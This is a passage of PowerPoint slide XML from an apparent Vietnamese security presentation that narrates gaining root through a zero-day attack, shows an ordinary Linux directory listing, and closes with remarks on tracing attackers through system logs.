              <a:t>lên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>chức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>đây</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>danh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>sách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>gõ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> ls: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>boot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>cdrom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>dev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>home</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>initrd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>initrd.img</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>lib</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>lost+found</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>media</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1677244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149687-AC41-4A12-9794-9520EC3B8E75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="262271"/>
            <a:ext cx="8596668" cy="5779092"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>mnt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>nohup.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>opt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>proc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>srv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>sys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>var</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>vmlinuz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1839892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C17BA3-C6B1-4CEB-AB71-38654A1B9AC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450506" y="226828"/>
            <a:ext cx="8596668" cy="6098069"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ok </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vậy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chúng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zeroday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>leo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> thang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quyền</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quyền</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chiếm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quyền</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>điều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khiển</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thúc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Khi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cuộc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zeroday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xảy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hoàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cơ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hội</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đáp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thậm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chí</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>còn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phát</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thống</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhưng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trốn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nghệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thuật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ẩn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kevin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Mitnick -” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mọi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chép</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>việc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>làm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>truy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kẻ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
